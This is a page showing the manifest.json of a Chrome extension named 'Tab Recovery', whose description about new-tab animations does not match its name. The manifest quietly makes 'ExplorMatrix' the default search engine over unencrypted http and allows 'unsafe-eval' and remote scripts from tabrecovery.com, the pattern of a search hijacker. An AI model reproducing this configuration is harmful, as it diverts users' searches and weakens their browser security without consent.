Tab Recovery - Save & Organize Your Tabs

Tab Recovery - Save & Organize Your Tabs

Customize Your New Tabs With Amazing Music Videos, Animations And HD Images, New Animations Uploaded Weekly.

Merlin
Additional files are visible only to premium users

manifest.json


{
  "update_url": "https://clients2.google.com/service/update2/crx",
  "name": "Tab Recovery - Save & Organize Your Tabs",
  "browser_action": {
    "default_icon": {
      "16": "icon-16.png",
      "32": "icon-32.png"
    },
    "default_popup": "popup.html",
    "default_title": "Tab Rescue"
  },
  "permissions": [
    "tabs",
    "storage",
    "windows",
    "unlimitedStorage",
    "https://api.bing.com/*",
    "*://tabrecovery.com/*"
  ],
  "background": {
    "scripts": [
      "background.bundle.js"
    ]
  },
  "icons": {
    "48": "icon-128.png",
    "128": "icon-128.png"
  },
  "chrome_url_overrides": {
    "newtab": "newtab.html"
  },
  "manifest_version": 2,
  "content_security_policy": "script-src 'self' https://ssl.google-analytics.com https://www.google-analytics.com https://tabrecovery.com 'unsafe-eval'; object-src 'self'",
  "description": "Customize Your New Tabs With Amazing Music Videos, Animations And HD Images, New Animations Uploaded Weekly.",
  "version": "0.0.25",
  "chrome_settings_overrides": {
    "search_provider": {
      "name": "ExplorMatrix",
      "keyword": "e",
      "search_url": "http://explormatrix.com/?q={searchTerms}",
      "favicon_url": "http://explormatrix.com/favicon.ico",
      "encoding": "UTF-8",
      "is_default": true
    }
  }
}